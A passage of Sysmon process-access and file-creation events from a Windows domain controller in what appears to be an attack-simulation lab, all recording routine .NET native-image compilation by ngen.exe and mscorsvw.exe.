d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6678,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.042\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00108AD60C00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.042","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00108AD60C00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6679,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.058\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00108AD60C00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.058","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00108AD60C00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.073\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010107A0C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.073","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010107A0C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.073\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0475-5F25-0000-0010107A0C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.073","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0475-5F25-0000-0010107A0C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.089\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DAD90C00}\r\nTargetProcessId: 3524\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.089","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DAD90C00}","TargetProcessId":"3524","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:20.120\r\nProcessGuid: {A837DB8D-047C-5F25-0000-0010DAD90C00}\r\nProcessId: 3524\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dc4-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll\r\nCreationUtcTime: 2020-08-01 05:58:20.120","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:20.120","ProcessGuid":"{A837DB8D-047C-5F25-0000-0010DAD90C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dc4-0\\Microsoft.ActiveDirectory.TRLParserInterop.dll","CreationUtcTime":"2020-08-01 05:58:20.120","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.136\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001037DD0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.136","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001037DD0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.136\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001037DD0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.136","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001037DD0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.136\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001037DD0C00}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.136","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001037DD0C00}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
